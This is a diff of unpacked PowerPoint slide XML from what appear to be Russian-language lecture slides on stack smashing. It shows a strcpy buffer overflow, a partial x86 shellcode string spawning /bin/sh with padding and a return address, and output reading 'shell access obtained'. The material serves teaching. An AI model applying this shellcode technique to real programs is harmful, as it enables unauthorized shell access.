+              <a:t>Segmentation fault (core dumped)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=25</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t># </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Получен доступ к </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>shell</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798697827"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -8811,1112 +10166,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A6B8A7-F482-4D39-865D-AE23037064A3}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пример</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: Stack Smashing</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA91837-38D1-4A24-925F-DD9873367FD5}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="578223" y="1574613"/>
-            <a:ext cx="6468035" cy="4351338"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>int main() {</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  char </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>[32];</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>strcpy</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>, code);</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>// </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Входная строка пользователя </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>const char code[] =</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  "\x31\xc0"    // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xorl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>, %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  "\x50"        // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  "\x68""//</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"  // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> $0x68732f2f</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  "\x68""/bin"  // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> $0x6e69622f</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  ...</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  PAD</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  // Return address can be obtained with returns below</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  "\x0c\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xde</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C88C31-DD25-4F92-91DA-1183E33B2D57}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks/>
-          </p:cNvSpPr>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6468035" y="1484219"/>
-            <a:ext cx="5723965" cy="5041340"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
-            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle>
-            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl1pPr>
-            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2400" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl2pPr>
-            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2000" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl3pPr>
-            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl4pPr>
-            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl5pPr>
-            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl6pPr>
-            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl7pPr>
-            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl8pPr>
-            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl9pPr>
-          </a:lstStyle>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
